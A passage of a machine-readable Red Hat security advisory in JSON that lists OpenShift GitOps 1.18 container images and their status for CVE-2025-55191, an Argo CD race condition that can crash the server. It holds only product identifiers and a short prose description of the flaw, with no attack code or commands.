"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-55191",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-09-30T23:00:51.184899+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400562"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions between 2.1.0 and 2.14.19, 3.2.0-rc1, 3.1.0-rc1 through 3.1.7, and 3.0.0-rc1 through 3.0.18 contain a race condition in the repository credentials handler that can cause the Argo CD server to panic and crash when concurrent operations are performed on the same repository URL. The vulnerability is located in numerous repository related handlers in the util/db/repository_secrets.go file. A valid API token with repositories resource permissions (create, update, or delete actions) is required to trigger the race condition. This vulnerability causes the entire Argo CD server to crash and become unavailable. Attackers can repeatedly and continuously trigger the race condition to maintain a denial-of-service state, disrupting all GitOps operations. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd/v2: github.com/argoproj/argo-cd/v3: Argo CD race condition leading to crash",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo CD server itself. The host system running Argo CD is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
